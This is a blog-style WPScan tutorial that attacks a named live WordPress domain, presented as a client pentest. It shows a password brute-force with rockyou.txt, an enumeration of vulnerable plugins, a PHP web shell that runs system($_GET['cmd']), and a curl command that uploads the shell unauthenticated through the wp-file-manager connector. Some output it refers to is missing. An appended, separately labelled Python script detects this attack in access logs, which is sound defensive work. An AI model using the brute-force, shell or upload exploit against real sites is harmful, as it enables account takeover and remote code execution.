WPScan: The Ultimate WordPress Security Scanner for Detecting Vulnerabilities

WordPress powers over 40% of the web, making it a prime target for hackers. If you’re serious about security, you need tools that can proactively identify weaknesses before attackers exploit them. That’s where WPScan comes in—a powerful, open-source security scanner designed specifically for WordPress. Whether you’re a developer, site owner, or security enthusiast, WPScan helps uncover vulnerabilities in plugins, themes, and core files, ensuring your site stays protected. In this post, we’ll explore what WPScan is, how it works, and why it’s an essential tool for safeguarding your WordPress site.

In this blog, we are going to pentest a WordPress site belonging to one of our clients. You can find the site here.

To use WPScan, you can either start a VM with Kali Linux running or you can download it for Mac/Windows here. You will also need to sign up (it's free) and obtain an API key from there. Once you have WPScan on your system and your API key, you can begin penetration testing.

Let's start the test by enumerating the users on the WordPress website and checking for any weak passwords. You can download this text file called rockyou.txt, which is a list of commonly used passwords across the internet.

Open up your terminal in the same directory as the rockyou.txt file and type:

wpscan --url https://locsexotica.com --passwords rockyou.txt

It will run for a few seconds, brute-forcing each password inside rockyou.txt against each user detected by WPScan until it finds a match.

In our case, after a few seconds, we see that it found a match with the username obvioususer and password123 (a very weak password). If we go to the login page of our site, we see that we can indeed log in with these credentials and gain Contributor-level access.

Next, let's try searching for any vulnerable plugins on the site. To do this, grab your API key from WPScan and enter the following in your terminal:

wpscan --url https://locsexotica.com -e vp --api-token <YOUR-API-TOKEN>

-e means enumerate and vp stands for vulnerable plugins. Run this command and wait a few seconds.

After a few minutes, we see a bunch of vulnerabilities found, with links on how to exploit them. Most interesting is Unauthenticated Arbitrary File Upload leading to RCE. You can read more about the exploit here. It basically means that we can submit a file via a POST request to https://example.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php and the file would actually be uploaded to the website! This can lead to remote code execution, and a hacker could potentially take over your entire site. Let's try it in our case. To do this, let's create a PHP file called shell.php:

<?php
echo "Hacked by WPScan!";
// Execute system commands
if(isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>

Now, let's use curl to submit the POST request with the required fields:

curl -i -X POST "https://locsexotica.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php" -F "cmd=upload" -F "target=l1_Lw" -F "upload[]=@shell.php"

After running the above, we see the following output in the terminal:

This response means we have successfully uploaded a file to the WordPress website while being unauthenticated. Now if we go to https://locsexotica.com/wp-content/plugins/wp-file-manager/lib/files/shell.php we see

Thus our hack is successful. To prevent these types of hacks from happening, we should regularly update our plugins. Join our newsletter for a free Website security audit!
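As an added defender-side example (not code from the original post or from WPScan), the following Python script parses Apache-style access-log lines and flags the two stages of the attack walked through above: a POST to the wp-file-manager connector, and a PHP file later served from its lib/files directory by the same client. The log lines, IP addresses and file name are constructed for the example.

```python
import re

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2024:12:00:01 +0000] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 512 "-" "curl/8.0"
203.0.113.5 - - [10/May/2024:12:00:03 +0000] "GET /wp-content/plugins/wp-file-manager/lib/files/shell.php?cmd=id HTTP/1.1" 200 64 "-" "curl/8.0"
198.51.100.7 - - [10/May/2024:12:01:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.7 - - [10/May/2024:12:01:05 +0000] "GET /wp-content/plugins/wp-file-manager/lib/files/shell.php?cmd=whoami HTTP/1.1" 200 64 "-" "Mozilla/5.0"
"""

# Fields we need from each line: client IP, HTTP method, request path, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
CONNECTOR = "/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
FILES_DIR = "/wp-content/plugins/wp-file-manager/lib/files/"


def parse_line(line):
    """Parse one combined-format log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string before matching
    return rec


def detect(log_text):
    """Return (ip, reason) alerts for the upload stage and the execution stage."""
    alerts = []
    uploaders = set()  # IPs that POSTed to the file-manager connector
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, method, path, status = rec["ip"], rec["method"], rec["path"], rec["status"]
        if method == "POST" and path == CONNECTOR:
            uploaders.add(ip)
            alerts.append((ip, "POST to wp-file-manager connector (upload attempt)"))
        elif path.startswith(FILES_DIR) and path.endswith(".php") and status == "200":
            # A PHP file being served from the upload directory should never happen;
            # if the same IP hit the connector first, the two stages are correlated.
            stage = "upload followed by execution" if ip in uploaders else "PHP served from upload dir"
            alerts.append((ip, stage))
    return alerts


if __name__ == "__main__":
    for ip, reason in detect(SAMPLE_LOG):
        print(f"{ip}: {reason}")
```

Blocking PHP execution under wp-content/plugins/wp-file-manager/lib/files/ at the web server, in addition to updating the plugin, would turn the second alert into a 403.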
